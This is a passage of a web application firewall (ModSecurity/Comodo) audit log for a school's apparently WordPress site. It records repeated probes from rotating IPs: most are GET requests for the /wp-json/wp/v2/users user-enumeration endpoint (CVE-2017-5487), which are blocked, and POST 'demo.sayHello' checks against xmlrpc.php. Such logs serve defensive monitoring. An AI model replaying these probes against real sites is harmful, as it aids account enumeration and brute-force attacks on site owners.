271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499523985806 2595 (- - -) Stopwatch2: 1747499523985806 2595; combined=1229, p1=433, p2=768, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --242ec754-Z-- --e41c2f67-A-- [17/May/2025:23:32:17 +0700] aCi6ERKi5m5upc8uMd5TlgAAAMk 103.236.140.4 41924 103.236.140.4 8181 --e41c2f67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e41c2f67-C-- demo.sayHello --e41c2f67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e41c2f67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499537496857 6521 (- - -) Stopwatch2: 1747499537496857 6521; combined=4748, p1=635, p2=3870, p3=39, p4=43, p5=97, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e41c2f67-Z-- --a0531c75-A-- [17/May/2025:23:33:55 +0700] aCi6c3yxdQCiyU1ENFfY5wAAABQ 103.236.140.4 48894 103.236.140.4 8181 --a0531c75-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a0531c75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0531c75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499635847685 2188 (- - -) Stopwatch2: 1747499635847685 2188; combined=930, p1=356, p2=555, p3=0, p4=0, p5=19, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0531c75-Z-- --befa856f-A-- [17/May/2025:23:34:03 +0700] aCi6ewTOsBn9MSWb6WIMsAAAAJM 103.236.140.4 49410 103.236.140.4 8181 --befa856f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --befa856f-C-- demo.sayHello --befa856f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --befa856f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499643098869 4296 (- - -) Stopwatch2: 1747499643098869 4296; combined=3240, p1=514, p2=2553, p3=27, p4=29, p5=69, sr=54, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --befa856f-Z-- --0fe6ba0d-A-- [17/May/2025:23:34:52 +0700] aCi6rATOsBn9MSWb6WIN6AAAAI4 103.236.140.4 52970 103.236.140.4 8181 --0fe6ba0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fe6ba0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fe6ba0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499692032007 7088 (- - -) Stopwatch2: 1747499692032007 7088; combined=5311, p1=497, p2=4744, p3=0, p4=0, p5=68, sr=80, sw=2, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe6ba0d-Z-- --4d43283b-A-- [17/May/2025:23:35:00 +0700] aCi6tOm4kjNN-hEbWjLdVAAAAFg 103.236.140.4 53584 103.236.140.4 8181 --4d43283b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d43283b-C-- demo.sayHello --4d43283b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d43283b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499700479973 6203 (- - -) Stopwatch2: 1747499700479973 6203; combined=4714, p1=691, p2=3777, p3=42, p4=54, p5=88, sr=62, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d43283b-Z-- --bc819f60-A-- [17/May/2025:23:35:28 +0700] aCi60ATOsBn9MSWb6WIO_AAAAI0 103.236.140.4 55502 103.236.140.4 8181 --bc819f60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bc819f60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc819f60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499728118888 2620 (- - -) Stopwatch2: 1747499728118888 2620; combined=1497, p1=488, p2=975, p3=0, p4=0, p5=34, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc819f60-Z-- --5e60943b-A-- [17/May/2025:23:35:35 +0700] aCi61-m4kjNN-hEbWjLeNgAAAE0 103.236.140.4 56042 103.236.140.4 8181 --5e60943b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.133 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5e60943b-C-- demo.sayHello --5e60943b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e60943b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499735312031 5867 (- - -) Stopwatch2: 1747499735312031 5867; combined=4183, p1=562, p2=3336, p3=36, p4=38, p5=120, sr=68, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e60943b-Z-- --e9e0d60c-A-- [17/May/2025:23:36:35 +0700] aCi7E3yxdQCiyU1ENFfcIAAAABg 103.236.140.4 60302 103.236.140.4 8181 --e9e0d60c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9e0d60c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9e0d60c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499795521034 2041 (- - -) Stopwatch2: 1747499795521034 2041; combined=1066, p1=382, p2=659, p3=0, p4=0, p5=24, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9e0d60c-Z-- --87384257-A-- [17/May/2025:23:36:43 +0700] aCi7GwTOsBn9MSWb6WIRpwAAAJU 103.236.140.4 60884 103.236.140.4 8181 --87384257-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87384257-C-- demo.sayHello --87384257-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87384257-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499803827915 4775 (- - -) Stopwatch2: 1747499803827915 4775; combined=3382, p1=461, p2=2736, p3=26, p4=28, p5=78, sr=53, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87384257-Z-- --1c87892b-A-- [17/May/2025:23:39:23 +0700] aCi7u-m4kjNN-hEbWjLj8gAAAFA 103.236.140.4 43788 103.236.140.4 8181 --1c87892b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c87892b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c87892b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499963143531 2363 (- - -) Stopwatch2: 1747499963143531 2363; combined=1052, p1=353, p2=673, p3=0, p4=0, p5=25, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c87892b-Z-- --d5236455-A-- [17/May/2025:23:39:30 +0700] aCi7wnyxdQCiyU1ENFfg1gAAABc 103.236.140.4 44334 103.236.140.4 8181 --d5236455-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d5236455-C-- demo.sayHello --d5236455-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5236455-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499970953961 6620 (- - -) Stopwatch2: 1747499970953961 6620; combined=5298, p1=732, p2=4193, p3=57, p4=59, p5=143, sr=66, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5236455-Z-- --0838cf7d-A-- [17/May/2025:23:39:35 +0700] aCi7xxKi5m5upc8uMd5fFQAAAMQ 103.236.140.4 44596 103.236.140.4 8181 --0838cf7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0838cf7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0838cf7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499975074538 2556 (- - -) Stopwatch2: 1747499975074538 2556; combined=1145, p1=410, p2=706, p3=0, p4=0, p5=29, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0838cf7d-Z-- --9659c633-A-- [17/May/2025:23:39:46 +0700] aCi70hKi5m5upc8uMd5fTQAAANc 103.236.140.4 45336 103.236.140.4 8181 --9659c633-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9659c633-C-- demo.sayHello --9659c633-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9659c633-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499986323857 5005 (- - -) Stopwatch2: 1747499986323857 5005; combined=3553, p1=528, p2=2812, p3=26, p4=28, p5=90, sr=86, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9659c633-Z-- --2ac0e430-A-- [17/May/2025:23:40:06 +0700] aCi75hKi5m5upc8uMd5fzQAAAMk 103.236.140.4 46740 103.236.140.4 8181 --2ac0e430-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ac0e430-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ac0e430-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500006425241 2099 (- - -) Stopwatch2: 1747500006425241 2099; combined=855, p1=300, p2=534, p3=0, p4=0, p5=21, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ac0e430-Z-- --7f4fd730-A-- [17/May/2025:23:40:12 +0700] aCi77Om4kjNN-hEbWjLlKAAAAE0 103.236.140.4 47188 103.236.140.4 8181 --7f4fd730-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f4fd730-C-- demo.sayHello --7f4fd730-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f4fd730-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500012793063 5262 (- - -) Stopwatch2: 1747500012793063 5262; combined=3959, p1=610, p2=3140, p3=30, p4=33, p5=87, sr=76, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f4fd730-Z-- --7516ab68-A-- [17/May/2025:23:41:00 +0700] aCi8HATOsBn9MSWb6WIZZAAAAJQ 103.236.140.4 50492 103.236.140.4 8181 --7516ab68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7516ab68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7516ab68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500060254507 2217 (- - -) Stopwatch2: 1747500060254507 2217; combined=940, p1=317, p2=601, p3=0, p4=0, p5=21, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7516ab68-Z-- --1ca93571-A-- [17/May/2025:23:41:05 +0700] aCi8IQTOsBn9MSWb6WIZkwAAAIE 103.236.140.4 50844 103.236.140.4 8181 --1ca93571-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1ca93571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ca93571-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 